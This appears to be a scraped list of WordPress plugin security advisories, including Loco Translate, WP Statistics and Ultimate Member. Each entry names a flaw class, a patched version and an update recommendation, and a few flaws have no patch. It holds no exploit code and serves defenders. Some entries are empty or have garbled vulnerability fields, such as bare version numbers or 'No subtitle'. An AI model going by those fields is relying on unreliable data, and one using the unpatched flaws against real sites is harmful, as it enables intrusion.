Plugin: SEO Scout: Content Optimization, Keyword Research, Rank Tracking + SEO Testing

Plugin: Social Slider Feed

Vulnerability: Authenticated (Scubscriber+) Stored Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Bootstrap Shortcodes

Plugin: wpForo Forum

Vulnerability: Privilege Escalation
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.9.52
Recommended Action: Update to version 2.9.52, or a newer patched version

Plugin: MAZ Loader – Preloader Builder for WordPress

Vulnerability: SQL Injection
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: BP Social Connect

Vulnerability: Authentication Bypass
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Add Shortcodes Actions And Filters

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.20.3
Recommended Action: Update to version 6.20.3, or a newer patched version

Plugin: Custom Login Page

Plugin: Accept Stripe Payments

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.0.80
Recommended Action: Update to version 2.0.80, or a newer patched version

Plugin: Participants Database

Vulnerability: Cross Site Request Forgery
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Arbitrary Roles and Capabilities Creation/Deletion
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: page-flip-image-gallery

Plugin: ReFlex Gallery » WordPress Photo Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Disable Right Click For WP

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.11.2
Recommended Action: Update to version 5.11.2, or a newer patched version

Plugin: Duplicate Post Page Menu & Custom Post Type

Vulnerability: Missing Authorization
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Cross-Site Request Forgery via getPluginStatus
Patched Version: 3.2.11
Recommended Action: Update to version 3.2.11, or a newer patched version

Plugin: Convert Pro

Vulnerability: Missing Authorization
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: On Page SEO + Social Live Chat (Formerly OPS)

Vulnerability: No subtitle
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: VM Backups

Plugin: Contact Form Email

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.66
Recommended Action: Update to version 1.2.66, or a newer patched version

Plugin: WP Symposium

Vulnerability: SQL Injections
Patched Version: 12.12
Recommended Action: Update to version 12.12, or a newer patched version

Plugin: RokStories

Vulnerability: Cross-Site Scripting
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Google Analytics Top Content Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: myghpay WooCommerce Payment Gateway

Plugin: WooCommerce Product Table Lite

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Lean WP

Plugin: CallRail Phone Call Tracking

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 0.4.10
Recommended Action: Update to version 0.4.10, or a newer patched version

Plugin: Database Backup for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting via backup_receipient Parameter
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Strong Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Scribble Maps

Plugin: Re-attacher by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Insert Estimated Reading Time

Plugin: BSK Forms Blacklist

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘order’ and ‘orderby’
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: Videos sync PDF

Plugin: XML Sitemap Generator for Google

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: AdPush

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.30
Recommended Action: Update to version 1.30, or a newer patched version

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Authenticated (Subscriber+) Privilege Escalation
Patched Version: 7.6.7
Recommended Action: Update to version 7.6.7, or a newer patched version

Plugin: Restrict Categories

Vulnerability: Reflected Cross-Site Scripting via rc-search
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.7
Recommended Action: Update to one of the following versions, or a newer patched version: 1.8.7, 1.9.10, 2.0.5, 2.1.11, 2.2.9, 2.3.7

Plugin: WP Google Maps Pro

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 8.1.12
Recommended Action: Update to version 8.1.12, or a newer patched version

Plugin: StagTools

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: ULeak Security & Monitoring Plugin

Plugin: Loco Translate

Vulnerability: Authenticated PHP Code Injection
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: Video Background

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.7.4
Recommended Action: Update to version 2.7.4, or a newer patched version

Plugin: WP Recipe Maker

Vulnerability: Directory Traversal
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Cross-Site Request Forgery to Plugin Channel Reset
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: A/B Test for WordPress

Plugin: Advanced Contact form 7 DB

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: ElasticPress

Vulnerability: Prototype Pollution
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Arbitrary File Upload
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: WP Docs

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: Abandoned Cart Recovery for WooCommerce

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.0.4.1
Recommended Action: Update to version 1.0.4.1, or a newer patched version

Plugin: AllWebMenus WordPress Menu Plugin

Vulnerability: Remote File Inclusion
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.8
Recommended Action: Update to version 3.8.8, or a newer patched version

Plugin: Medialist

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Total Security

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: LionScripts: IP Blocker Lite

Plugin: Rencontre – Dating Site

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Memory Usage, Memory Limit, PHP and Server Memory Health Check and Provide Suggestions

Vulnerability: Cross-Site Scripting
Patched Version: 2.44
Recommended Action: Update to version 2.44, or a newer patched version

Plugin: OSD Subscribe

Plugin: QuBot – Chatbot Builder with Templates

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Sliding Social Icons

Vulnerability: Cross-Site Request Forgery and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Futurio Extra

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: SureTriggers: All-in-One WordPress Automation

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.24
Recommended Action: Update to version 1.0.24, or a newer patched version

Plugin: Seriously Simple Stats

Vulnerability: Authenticated (Podcast manager+) SQL Injection via order_by
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Easy Appointments

Vulnerability: Cross-Site Request Forgery via multiple AJAX actions
Patched Version: 3.11.10
Recommended Action: Update to version 3.11.10, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: 1.2.997
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Coru LFMember

Plugin: Mailjet Email Marketing

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 5.3.1
Recommended Action: Update to version 5.3.1, or a newer patched version

Plugin: stripshow

Plugin: Global Flash Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 0.15.2
Recommended Action: Update to version 0.15.2, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 5.2.5
Recommended Action: Update to version 5.2.5, or a newer patched version

Plugin: Sticky Menu & Sticky Header

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.21
Recommended Action: Update to version 2.21, or a newer patched version

Plugin: Dynamic Widgets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Minimum Purchase for WooCommerce

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.47
Recommended Action: Update to version 1.1.47, or a newer patched version

Plugin: A2 Optimized WP – Turbocharge and secure your WordPress site

Vulnerability: Cross Site Request Forgery
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: File Manager

Vulnerability: Unauthenticated Resource Access to Site Backups
Patched Version: 6.5
Recommended Action: Update to version 6.5, or a newer patched version

Plugin: MainWP Matomo Extension

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Spam Injection
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Captcha Bypass
Patched Version: 1.15.21
Recommended Action: Update to version 1.15.21, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.49
Recommended Action: Update to version 3.2.49, or a newer patched version

Plugin: Termly – GDPR/CCPA Cookie Consent Banner

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: Live Chat with Messenger Customer Chat

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: DMSGuestbook

Plugin: Sermon Browser

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 0.45.16
Recommended Action: Update to version 0.45.16, or a newer patched version

Plugin: Album and Image Gallery plus Lightbox

Vulnerability: Missing Authorization
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Reflected Cross-Site Scripting via font-size
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: WP Frontend Profile

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.2.2
Recommended Action: Update to version 0.2.2, or a newer patched version

Plugin: Logo Carousel – Responsive Logo Slider, Logo Showcase, and Clients Logo Gallery

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Ship To eCourier

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Cimy User Manager

Vulnerability: Arbitrary File Read
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Magic Post Voice

Plugin: WP-Syntax

Vulnerability: Remote Code Execution
Patched Version: 0.9.10
Recommended Action: Update to version 0.9.10, or a newer patched version

Plugin: Google Map

Vulnerability: SQL Injection
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Advanced Booking Calendar

Plugin: WP Gallery Metabox

Plugin: WP Subscribe

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.13
Recommended Action: Update to version 1.2.13, or a newer patched version

Plugin: Simple Portfolio Gallery

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: WP Hide Pages

Plugin: Support Board

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Recently Viewed Products

Plugin: HT Mega – Absolute Addons For Elementor

Vulnerability: Missing Authorization to Privilege Escalation
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: CodeBard's Patron Button and Widgets for Patreon

Vulnerability: Reflected Cross-Site Scripting via ‘site_account’
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Exquisite PayPal Donation

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Insecure Content Warning

Vulnerability: Remote Code Execution
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: 6.3.0
Recommended Action: Update to version 6.3.0, or a newer patched version

Plugin: Simple:Press Forum

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Forum Replies
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Authenticated SQL Injection via Orderby
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: 2.6.7.6
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Advanced Schedule Posts

Plugin: Download Manager

Vulnerability: Authenticated (Contributor+) PHAR Deserialization
Patched Version: 3.2.50
Recommended Action: Update to version 3.2.50, or a newer patched version

Plugin: NextCellent Gallery – NextGEN Legacy

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.9.18
Recommended Action: Update to version 1.9.18, or a newer patched version

Plugin: Email Artillery (MASS EMAIL)

Plugin: Elementor Addon Elements

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.12.8
Recommended Action: Update to version 1.12.8, or a newer patched version

Plugin: Export and Import Users and Customers

Vulnerability: Missing Authorization to Authenticated (Shop Manager) Arbitrary User Password Change
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Sensitive Information Disclosure
Patched Version: 5.2
Recommended Action: Update to version 5.2, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Authenticated (Subscriber+) Arbitrary Option Update
Patched Version: 5.5.2
Recommended Action: Update to version 5.5.2, or a newer patched version

Plugin: Crelly Slider

Vulnerability: SQL Injection
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Etsy Shop

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 7.11.35
Recommended Action: Update to version 7.11.35, or a newer patched version

Plugin: Powerplay Gallery

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Local File Inclusion
Patched Version: 3.8.12
Recommended Action: Update to version 3.8.12, or a newer patched version

Plugin: Easy Modal

Vulnerability: SQL Injection
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Table Generator

Vulnerability: Missing Authorization to Table Modification
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Page Ordering

Vulnerability: Open Redirect
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: GD Rating System

Vulnerability: Directory Traversal
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Download Monitor

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Go Pricing – WordPress Responsive Pricing Tables

Vulnerability: WordPress Responsive Pricing Tables <= 3.3.19
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: 404 Solution

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 2.35.0
Recommended Action: Update to version 2.35.0, or a newer patched version

Plugin: CPT Shortcode Generator

Plugin: Font Awesome

Vulnerability: API Token Exposure
Patched Version: 4.0.0-rc17
Recommended Action: Update to version 4.0.0-rc17, or a newer patched version

Plugin: Better WordPress reCAPTCHA (with no CAPTCHA reCAPTCHA)

Plugin: Resim Ara

Plugin: Time Sheets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Stored Cross-Site Scripting via HTTP_HOST
Patched Version: 5.2.4
Recommended Action: Update to version 5.2.4, or a newer patched version

Plugin: Complianz Premium – GDPR/CCPA Cookie Consent

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 6.4.7
Recommended Action: Update to version 6.4.7, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authorization Bypass
Patched Version: 2.5.5
Recommended Action: Update to version 2.5.5, or a newer patched version

Plugin: OOPSpam Anti-Spam

Vulnerability: Cross-Site Request Forgery via empty_ham_entries and empty_spam_entries
Patched Version: 1.1.45
Recommended Action: Update to version 1.1.45, or a newer patched version

Plugin: Stars Rating

Vulnerability: Denial of Service
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Seed Social

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Mail logging – WP Mail Catcher

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.0.0
Recommended Action: Update to version 2.6.0.0, or a newer patched version

Plugin: Popups – WordPress Popup

Plugin: Paid Memberships Pro CCBill Gateway

Vulnerability: Insufficient Authorization
Patched Version: 0.4
Recommended Action: Update to version 0.4, or a newer patched version

Plugin: SpiderVPlayer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Export WP Page to Static HTML/CSS

Vulnerability: Missing Authorization via Multiple AJAX Actions
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: StoryChief

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.0.31
Recommended Action: Update to version 1.0.31, or a newer patched version

Plugin: WOWRestro – Online Ordering System For WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 5.3.3
Recommended Action: Update to version 5.3.3, or a newer patched version

Plugin: ActiveCampaign – Forms, Site Tracking, Live Chat

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.1.12
Recommended Action: Update to version 8.1.12, or a newer patched version

Plugin: Popup contact form

Plugin: FileBird – WordPress Media Library Folders & File Manager

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting via Folder Import
Patched Version: 5.6.1
Recommended Action: Update to version 5.6.1, or a newer patched version

Plugin: Currency Converter Widget – Exchange Rates

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.66
Recommended Action: Update to version 2.0.66, or a newer patched version

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.1
Recommended Action: Update to version 9.1, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via list_id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Royal Elementor Addons and Templates

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.76
Recommended Action: Update to version 1.3.76, or a newer patched version

Plugin: Patreon WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: BackupBuddy

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WatchTowerHQ

Vulnerability: Type Juggling to Authentication Bypass in check_ota
Patched Version: 3.6.17
Recommended Action: Update to version 3.6.17, or a newer patched version

Plugin: Launchpad – Coming Soon & Maintenance Mode Plugin

Plugin: YouTube Embed

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 5.2.2
Recommended Action: Update to version 5.2.2, or a newer patched version

Plugin: eShop

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.2.9
Recommended Action: Update to version 6.2.9, or a newer patched version

Plugin: Software License Manager

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Domain Deletion
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: 3.3.0
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: My YouTube Channel

Vulnerability: Missing Authorization
Patched Version: 3.23.0
Recommended Action: Update to version 3.23.0, or a newer patched version

Plugin: WooCommerce Customers Manager

Vulnerability: Authenticated Account Creation and Privilege Escalation
Patched Version: 26.5
Recommended Action: Update to version 26.5, or a newer patched version

Plugin: Accordion

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.2.43
Recommended Action: Update to version 2.2.43, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Authenticated (Subscriber+) Order Modification
Patched Version: 5.6.1
Recommended Action: Update to version 5.6.1, or a newer patched version

Plugin: Copyright Proof

Plugin: Mail On Update

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: MouseWheel Smooth Scroll

Vulnerability: Plugin’s Setting Update via Cross-Site Request Forgery
Patched Version: 5.7
Recommended Action: Update to version 5.7, or a newer patched version

Plugin: WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Twitter Friends Widget

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Request Forgery to Field Import and PHP Object Injection
Patched Version: 3.6.10
Recommended Action: Update to version 3.6.10, or a newer patched version

Plugin: Calendar Event Multi View

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 1.4.07
Recommended Action: Update to version 1.4.07, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘clear_uucss_logs’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.0.46
Recommended Action: Update to version 2.0.46, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: Advanced Contact form 7 DB

Vulnerability: Authenticated Arbitrary File Deletion
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Uploadify

Plugin: Advanced Booking Calendar

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Cookie Notice & Consent

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Checklist

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Cardinity Payment Gateway for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: Surbma | GDPR Proof Cookie Consent & Notice Bar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 17.6.0
Recommended Action: Update to version 17.6.0, or a newer patched version

Plugin: TS Webfonts for さくらのレンタルサーバ

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: SQL Injection
Patched Version: 3.0.330
Recommended Action: Update to version 3.0.330, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Modal Window – create popup modal window

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: Comment Highlighter

Plugin: InstaWP Connect – 1-click WP Staging & Migration

Vulnerability: Missing Authorization to Unauthenticated Post/Taxonomy/User Add/Change/Delete, Customizer Setting Change, Plugin Installation/Activation/Deactication via events_receiver
Patched Version: 0.0.9.19
Recommended Action: Update to version 0.0.9.19, or a newer patched version

Plugin: Maintenance Mode by Supsystic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Permalink Manager Lite

Vulnerability: No subtitle
Patched Version: 2.2.15
Recommended Action: Update to version 2.2.15, or a newer patched version

Plugin: wordcamp-talks

Vulnerability: CSV Injection
Patched Version: 1.0.0-beta3
Recommended Action: Update to version 1.0.0-beta3, or a newer patched version

Plugin: WatuPRO

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.9.0.8
Recommended Action: Update to version 4.9.0.8, or a newer patched version

